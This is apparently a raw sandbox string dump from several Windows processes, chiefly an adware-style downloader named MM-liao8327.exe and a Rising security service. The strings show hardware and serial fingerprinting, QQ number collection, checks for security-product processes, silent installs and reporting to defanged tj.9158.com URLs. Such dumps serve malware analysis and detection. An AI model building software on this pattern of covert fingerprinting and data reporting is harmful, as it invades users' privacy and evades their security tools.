Function failed$NTVDM has encountered a System Error*Driver does not support selected Baud Rate
Function failed$NTVDM has encountered a System Error*Driver does not support selected Baud Rate
ntvdm.exe_680_rwx_00000000_00010000:
C:\SETUP_~1.EXE
SCS4.TMP
86.EXE
SETUP_~1EXE
."/\[]:| =;,
c:\wina20.386
%WinDir%\SYSTEM32\COUNTRY.SYS
1234567890-=
!@#$%^&*()_
789-456 1230.
%WinDir%\SYSTEM32\COMMAND.COM
m32\DOSX.EXE
%File allocation table bad, drive %1
Invalid COMMAND.COM
!Press any key to continue . . .
Cannot execute %1
Error in EXE file
%WinDir%\TEMP\scs4.tmp
arameter vaCOMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
OS=Windows_NT
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
SYSTEMROOT=%WinDir%
TEMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
\COMMAND.COM
COMSPEC=\COMMAND.COM
BMicrosoft(R) Windows DOS
FCOMMAND [[drive:]path] [device] [/E:nnnnn] [/P] [/C string] [/MSG]
H [drive:]path Specifies the directory containing COMMAND.COM file.
N /MSG Specifies that all error messages be stored in memory. You
%Intermediate file error during pipe
Switches may be preset in the DIRCMD environment variable. Override
>Quits the COMMAND.COM program (command interpreter).
]Displays or sets a search path for executable files.
$B | (pipe)
%Displays the MS-DOS version.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
key to continue...."
PATH=PROMPT=COMSPEC=DIRCMD=
.COM.EXE.BAT?VBAPWRHSvDANEDSG
%WinDir%\SYSTEM32
[]| =;"
ntvdm.exe_680_rwx_00010000_00090000:
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
%WinDir%\TEMP\scs4.tmp
0WINDOWS MS-DOS STARTUP FILE
0CONFIG.SYS VS CONFIG.NT
0CONFIG.SYS IS NOT USED TO INITIALIZE THE MS-DOS ENVIRONMENT.
0CONFIG.NT IS USED TO INITIALIZE THE MS-DOS ENVIRONMENT UNLESS A
0IS INITIALIZED. TO DISPLAY CONFIG.NT/AUTOEXEC.NT INFORMATION, ADD
0THE COMMAND ECHOCONFIG TO CONFIG.NT OR OTHER STARTUP FILE.
0NTCMDPROMPT
0MS-DOS-BASED APPLICATION, WINDOWS RUNS COMMAND.COM. THIS ALLOWS THE
0TSR TO REMAIN ACTIVE. TO RUN CMD.EXE, THE WINDOWS COMMAND PROMPT,
0RATHER THAN COMMAND.COM, ADD THE COMMAND NTCMDPROMPT TO CONFIG.NT OR
0COMMAND.COM. IF YOU START AN APPLICATION OTHER THAN AN MS-DOS-BASED
0CONFIG.NT OR OTHER STARTUP FILE.
0WANT THE SYSTEM TO SUPPORT. 1
0AND LEAVE THE RESTS(IF AVAILABLE) TO BE USED BY DOS TO SUPPORT
0WITH YOUR APPLICATION OR _DEFAULT.PIF). IF THE SIZE FROM PIF FILE
D%WinDir%\SYSTEM32\HIMEM.SYS
Q001,437,%WinDir%\SYSTEM32\COUNTRY.SYS
S%WinDir%\SYSTEM32\COMMAND.COM
/P %WinDir%\SYSTEM32
ATION OR _DEFAULT.PIF). IF THE SIZE FROM PIF FILE
DEVICE=%WinDir%\SYSTEM32\HIMEM.SYS
COUNTRY=001,437,%WinDir%\SYSTEM32\COUNTRY.SYS
SHELL=%WinDir%\SYSTEM32\COMMAND.COM /P %WinDir%\SYSTEM32
%WinDir%\SYSTEM32\COUNTRY.SYS
[]| =;"
%WinDir%\TEMP\scs3.tmp
%WinDir%\SYSTEM32\COMMAND.COM
NTCMDPROMPTT
Unrecognized command in CONFIG.SYS
Insufficient memory for COUNTRY.SYS file
Incorrect order in CONFIG.SYS line $Error in CONFIG.SYS line $WARNING! Logical drives past Z: exist and will be ignored
1234567890-=
!@#$%^&*()_
789-456 1230.
Windows NT MS-DOS subsystem Mouse Driver
!Press any key to continue . . .
%Intermediate file error during pipe
Switches may be preset in the DIRCMD environment variable. Override
>Quits the COMMAND.COM program (command interpreter).
]Displays or sets a search path for executable files.
$B | (pipe)
%Displays the MS-DOS version.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
key to continue...."
PATH=PROMPT=COMSPEC=DIRCMD=
.COM.EXE.BAT?VBAPWRHSvDANEDSG
%WinDir%\SYSTEM32\DOSX
NT.EXE
C:\SETUP_~1.EXE
m32\DOSX.EXE
nt.exe
DOSX.EXE
ntvdm.exe_680_rwx_000A0000_00020000:
ntvdm.exe_680_rwx_000C9000_00013000:
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
OS=Windows_NT
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
SYSTEMROOT=%WinDir%
TEMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
%System%\DOSX.EXE
%System%\mscdexnt.exe
VCDEX.DLL
%System%\redir
(load before dosx.exe)
C:\LANMAN.DOS
%System%\dosx
%System%\krnl386.exe
krnl386.exe
SYSTEM.INI
ntvdm.exe_680_rwx_000E8000_00008000:
Windows NT MS-DOS subsystem Mouse Driver
ntvdm.exe_680_rwx_00100000_00010000:
to run Windows in Enhanced Mode
RsMgrSvc.exe_468:
.text
`.rdata
@.data
.rsrc
CryptDecodeObject failed with %x
wintrust.dll
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
crypt32.dll
CryptMsgGetParam
CryptSIPVerifyIndirectData failed with %x
1.3.6.1.4.1.311.2.1.4
CryptMsgGetParam(%d) failed with %x
CryptSIPRetrieveSubjectGuid failed with %x
CryptQueryObject failed with %x
\\.\PhysicalDrive%d
\\.\Scsi%d:
Iphlpapi.dll
Software\Microsoft\Windows\CurrentVersion
Advapi32.dll
\Rising\RSD\RsMgrSvc.exe"
Explorer.exe
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[d-d-d][d:d:d:d]
SHFolder.dll
Shell32.dll
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
WinSessionThread GetPidByName dwPID = %d , name=%s!
NtDll.dll
Kernel32.dll
WTSQueryUserToken Failed! Err Code: %d
wtsapi32.DLL
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
>`userinit.exe
CRsMgrSvc::WaitForLogonNT:LoadLibrary(_"psapi.dll");err=0x%x
psapi.dll
Fail to OpenProcessToken; 0x%x
Failed to call CreateProcessAsUser again: appname = %s cmd=%s;err=0x%x.
Failed to SetTokenInformation(0):err=0x%x
Failed to call CreateProcessAsUser:cmd=%s;err=0x%x.
Failed to DuplicateTokenEx:err=0x%x
Failed to SetTokenInformation:err=0x%x
SessionId = %d
Failed to LoadLibrary("Wtsapi32.dll"):err=0x
Failed to call WTSEnumerateSessions:err=0x%x
SessionInfo[%d]: SessionId=%d; WinStationName=%s; State=%d.
Wtsapi32.dll
Failed to CreateProcess:%s;err=0x%x
Failed to LoadLibrary("Wtsapi32.dll"):err=0x%x
Failed to WTSEnumerateSessions:err=0x%x
Session\%d\RSD_POP_MESSAGE_INFO
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
Userenv.DLL
WinSessionThread CreateProcess begin dwSessionID = %d!
Failed to LoadLibrary("Userenv.DLL"):err=0x%x
Failed to call CreateProcessAsUser: cmd=%s;err=0x%x.
New Failed to call WTSQueryUserToken, err= 0x%x
rsmsg
%s\rsmsginfo.ini
Failed to open the shell ready event: 0x%x
"%s" /shellrun
%s\RsStub.exe
Session\%d\ShellReadyEvent
LogonRun - session : %d
Failed to call RegOpenKeyEx, err = 0x%x
Failed to call RegSaveKey, err = 0x%x
Failed to call AdjustTokenPrivileges, err = 0x%x
Failed to call OpenPrcessToken, err = 0x%x
%s\RsMgrSvc.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
BaiduAnSvc.exe
BaiduSdSvc.exe
liebao.exe
ksafe.exe
{849B7E2B-0551-429C-B317-14B7D374D6EC}_is1
kxescore.exe
QQPCRtp.exe
360sd.exe
360se.exe
{23F3F476-BE34-4f48-9C77-2806A8393EC4}
360Desktop.exe
ZhuDongFangYu.exe
safeboxTray.exe
Failed to Create LogonRunThread Thread, err = 0x%x
SessionChange:EventType=%d; sessionID = %d
\Backup\RSD\RSSetup\RSSetup.xml
rsup10.rising.com.cn
u.suxiazai.com
%s?t=0&info=%s
ver=%s&guid=%s&sguid=%s&state=%s
hXXp://u.suxiazai.com/menu/info.xml
hXXp://rsup10.rising.com.cn/menu/info.xml
%srsd\info.xml
/subkey
Failed to Verify the "%s".
Failed to call vf.Init.
%s\rsbackup.exe
"%s\rsbackup.exe"
/subkey
%s\RsMgrSvc.ini
%s\updater.exe
"%s\updater.exe"
DeleteFile: %s.
ITEM%d
\RsMgrSvc.ini
DeletePath: %s.
Clean WillReboot In %s
%s\%s\%s.ini
1971-01-01 00:00:00
%d-%d-%d %d:%d:%d
%s\Data
%s /subkey %s /RsMgrSvc
"%s\Updater.exe" /silence
%s\Updater.exe
\Reboot.ini
CRsMgrSvc::SVC:Failed to CreateEvent-Wait: err=0x%x
CRsMgrSvc::SVC:Failed to CreateEvent, err=0x%x
comx3.dll
KERNEL32.DLL
kernel32.dll
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
HTTP/1.0
Range: bytes=%d-
RstoreDll.dll
@CRsUseRepairProduct::prstorestart %s Dllpath:%s
@CRsUseRepairProduct::prstorestart %s
Subkey: %s could not find dllPath ,so use rsd path:%s
Subkey: %s Path:%s
\RstoreDll.dll
02%d.d.d.d
CRsLoadCloud::DownLoadCldRsdDll... faild hre = %d ,lasterror = %d
CRsLoadCloud::LoadCldRsdDll... failed lasterror = %d
CRsLoadCloud::LoadCldRsdDll...%s
CRsLoadCloud::StartTask...success
CRsLoadCloud::InitData... CopyFile flag= %d.
hXXp://download.suxiazai.com/for_down/2013/new/dlls/CldRsd.dll
CldRsd.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
C:\DistributedAutoLink\Temp\CompileOutputDir\RsMgrSvc.pdb
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyA
RegSaveKeyA
RegQueryInfoKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
CryptMsgClose
CertCloseStore
CertGetNameStringW
CertFindCertificateInStore
CRYPT32.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
WININET.dll
VERSION.dll
GetProcessHeap
GetCPInfo
%Program Files%\Rising\RSD\RsMgrSvc.exe.log
%Program Files%\Rising\RSD\RsMgrSvc.exe
.Beijing Rising Information Technology Corporation Limited
1.0.0.50
RsMgrSvc.exe
20150423153938597
popwndexe.exe_592:
.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
C:\DistributedAutoLink\Temp\CompileOutputDir\popwndexe.pdb
KERNEL32.dll
ole32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
mscoree.dll
KERNEL32.DLL
rsdk.dll
BUF:{E59BC62D-64AB-439D-BAF3-B2D1BA15E441}{4F496E7F-D8FD-4DED-967D-C4F53BFB9452}{216DFF2F-B2F0-4CE0-BA5B-72E0B7BFAC28}{C8CA7580-8E65-49E6-A66A-B087C7EF523D}{5D37C04C-8F58-4D47-94C8-B94153399473}{ED20E0E5-2357-4825-B3FA-198AEC674E81}{AD4F3A47-0CD6-43DE-BC22-E8BE24FFD424}{2100E98D-B13E-4306-8081-50F325B10586}{0AEF80FB-9BAF-4E66-96B3-784ED0FCECF1}{E8D494C-D598-4E2F-B796-809E74315E76}{95EAB9C4-A7F4-46A8-A69F-54911364F2F0}{EBC23555-424F-45C3-BECE-206819CB276B}{4FCE6281-8849-4FC6-A764-95C793EB8A48}{FCA0E62A-5DD4-46FB-AFB2-BDC74EA7DB36}{35FD921E-B758-46D8-B0AA-FCD033B0E66D}{201409F6-22F8-48D3-A69F-7935BDDE6BFA}{787683B8-D58D-4072-BA04-46284CEA5AF8}{224E5B34-E98F-4033-8B6F-46B758E7587E}{23BD3E3A-72ED-4AE4-A5A9-41B466BA8D25}{B769D42A-2392-42B6-8C10-DB99AE23F75A}{1DDF6C09-67B3-4b05-B3A4-43D7D92D067C}{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}
{{887FE1BB-7C1F-4d73-BD44-B726E1672DC7}}_%s
%Program Files%\Rising\RSD\popwndexe.exe
1.0.0.7
tray.exe
814210592210000
MM-liao8327.exe_1372:
.text
`.rdata
@.data
.rsrc
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
homeUrl
downUrl
C:\Windows\Temp\temp.icon
c://temp.icon
ProExe
DownloadUrl
ErrorUrl
AdvertUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceTypeModifier: x
RemovableMedia: %d
CommandQueueing: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
Drive%dType
Drive%dControllerBufferSize
Drive%dControllerRevisionNumber
Drive%dSerialNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
%sDownLoad
_%s%s.exe
_%s.exe
/S /D=%s
%sDownLoad\%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%d*%d
%s(%s)
...%d%c
%Program Files%
%s Inx:%d Offset:%d Len:%d
.tmp.tg
****ERR:%d,
nInx:%d, offset:%d, siz:%d
%d, lRemain
ConnectSvr:%s
X-X-X-X-X-X
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows 7
unknown OperatingSystem.
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
%s %s
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
deepscan\zhudongfangyu.exe
360safe.exe
ZhuDongFangYu.exe
QQ.exe
T58web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
USER32.DLL
F%D,3
F%D,3
OLEACC.dll
OLEACC.dll
SHLWAPI.dll
SHLWAPI.dll
WSOCK32.dll
WSOCK32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
ShellExecuteExA
ShellExecuteExA
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
oledlg.dll
oledlg.dll
OLEAUT32.dll
OLEAUT32.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
NETAPI32.dll
NETAPI32.dll
VERSION.dll
VERSION.dll
UrlUnescapeA
UrlUnescapeA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
InternetOpenUrlA
InternetOpenUrlA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCFileException@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCObject@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
zcÃ
zcÃ
00000000000000000001
00000000000000000001
c:\MM-liao8327.exe
c:\MM-liao8327.exe
`R.qB
`R.qB
h/y%DlRZ
h/y%DlRZ
J!Ç
J!Ç
yR^y.%U3
yR^y.%U3
/.Ro}!
/.Ro}!
p)%sQ
p)%sQ
CZ%SY
CZ%SY
.vyOx
.vyOx
.Pm[
.Pm[
42a%u
42a%u
O%fWU
O%fWU
%cPqt
%cPqt
F2/%c
F2/%c
C7%SQ5
C7%SQ5
XU%fR
XU%fR
QN.Ui
QN.Ui
IßD
IßD
(Bô|
(Bô|
.Qsty
.Qsty
.bYV`
.bYV`
40%sS
40%sS
%%co\s
%%co\s
P.WGD
P.WGD
2Um
2Um
%U2b&0
%U2b&0
%se7sQ
%se7sQ
[Q.QN]
[Q.QN]
4g%x=XL$5
4g%x=XL$5
.Bsw&wf
.Bsw&wf
uÿQ
uÿQ
R#.oR
R#.oR
45.sSC
45.sSC
OBW2%S2%S2
OBW2%S2%S2
u\%Cr@
u\%Cr@
.Pd4{
.Pd4{
[K.On
[K.On
W.eQYT
W.eQYT
gB7%U
gB7%U
9~ui.QBv@
9~ui.QBv@
J.pEu
J.pEu
\.MdB
\.MdB
accKeyboardShortcut
accKeyboardShortcut
mscoree.dll
mscoree.dll
ekernel32.dll
ekernel32.dll
KERNEL32.DLL
KERNEL32.DLL
DownloadInstall.Document
DownloadInstall.Document
(*.*)
(*.*)
Output.prn$
Output.prn$
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
1, 0, 0, 1
1, 0, 0, 1
DownloadInstall.EXE
DownloadInstall.EXE